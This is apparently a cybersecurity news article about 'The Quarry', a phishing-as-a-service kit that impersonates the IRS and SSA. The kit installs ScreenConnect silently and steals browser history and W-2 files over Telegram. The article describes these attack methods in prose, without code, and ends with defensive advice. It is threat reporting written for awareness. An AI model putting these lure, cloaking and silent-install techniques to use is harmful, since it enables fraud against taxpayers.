Hackers Abuse RMM Tools in The Quarry IRS/SSA Legitimate Phishing

A highly organized cybercrime operation, dubbed The Quarry, is behind a recent wave of phishing campaigns specifically targeting American taxpayers. These campaigns, which exploit legitimate Remote Monitoring and Management (RMM) tools, impersonate the IRS and Social Security Administration (SSA) to deceive victims. New research details these sophisticated tactics in a What appeared to be dozens of unrelated incidents impersonating the IRS, Social Security Administration, and platforms like DocuSign turned out to be the work of one developer selling a Phishing-as-a-Service (PhaaS) toolkit to nearly 200 paying operators.

The operation has been active since at least April 2025 and continues to run at the time of reporting.

The toolkit gives buyers everything they need to launch a full campaign without building a single tool themselves. Operators receive phishing pages, cloaking infrastructure, remote access panels, bulk email tools, and post-exploitation scripts.

Tax season is the most exploited window, but the operation runs year-round, adapting its lures to whatever pretext is most convincing.

Analysts at SOCRadar were the first to identify and document this ecosystem, naming it The Quarry in a report shared with Cyber Security News (CSN).

The threat actor behind it operates under the alias RockyBelling, also known as Rock, Rockky, and Mike, and runs a Telegram channel called Rocky War Room, which had 194 subscribers at the time of analysis.

The channel functions as a product catalog, support desk, and announcement board for new tool releases.

What makes The Quarry especially dangerous is its use of legitimate remote monitoring and management software as the final payload.

Instead of deploying recognizable malware, operators deliver a silent installation of ConnectWise ScreenConnect, a widely trusted remote access tool.

This lets attackers gain full control over a victim’s device while bypassing detection tools that would normally flag traditional malware.

The operation already shows signs of growing downstream risk, with stolen credentials potentially being sold to ransomware groups through Initial Access Broker activity.

Over 500 distinct victim IP addresses were identified across 14 countries, with more than 90 percent of victims located in the United States.

Hackers Abuse Legitimate RMM Tools

The attack begins with a bulk email designed to look like an IRS refund notice, an SSA tax filing confirmation, or a document shared through a trusted platform.

When a victim clicks the link, the site quietly filters out non-Windows visitors and automated security scanners. A second layer uses Adspect, a traffic cloaking service, to block researchers before the fake page ever loads.

The phishing page replicates the Social Security Administration portal with convincing detail, including the SSA seal and familiar layout sections.

Victims are told to download a “Security Connector” to access their statement, while the real payload, a ScreenConnect MSI installer, downloads silently through a hidden webpage frame.

In April 2026, the developer released a VBS dropper sent by email that installs ScreenConnect silently while opening a decoy PDF to distract the victim.

Post-Exploitation Tools and Victim Impact

Once ScreenConnect is installed, operators can deploy PowerShell scripts to extract valuable data. One script pulls six months of browser history after forcibly closing the browser to unlock its database, sending the data to the operator through Telegram.

A second script scans the victim’s files for W-2 tax documents, targeting Social Security numbers, employer records, and salary information.

The developer’s Telegram channel also promotes VioletRAT, a tool with credential dumping and cookie theft capabilities.

AWS access keys have been found in campaign logs, harvested from public-facing JavaScript files belonging to targeted organizations.

These capabilities confirm the operation actively pursues high-value financial and corporate data beyond simple credential theft.

Organizations can defend against The Quarry by maintaining an approved list of remote access tools and flagging any unexpected ScreenConnect installation immediately.

Telegram API traffic from endpoints that do not normally use the platform should be investigated, as it may signal active exfiltration.

Since government impersonation is central to this campaign, employees should know that the IRS and SSA never send executable downloads by email. Restricting VBScript execution from user-writable directories would further disrupt the VBS delivery chain before it can complete.

Indicators of Compromise (IoCs):-

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.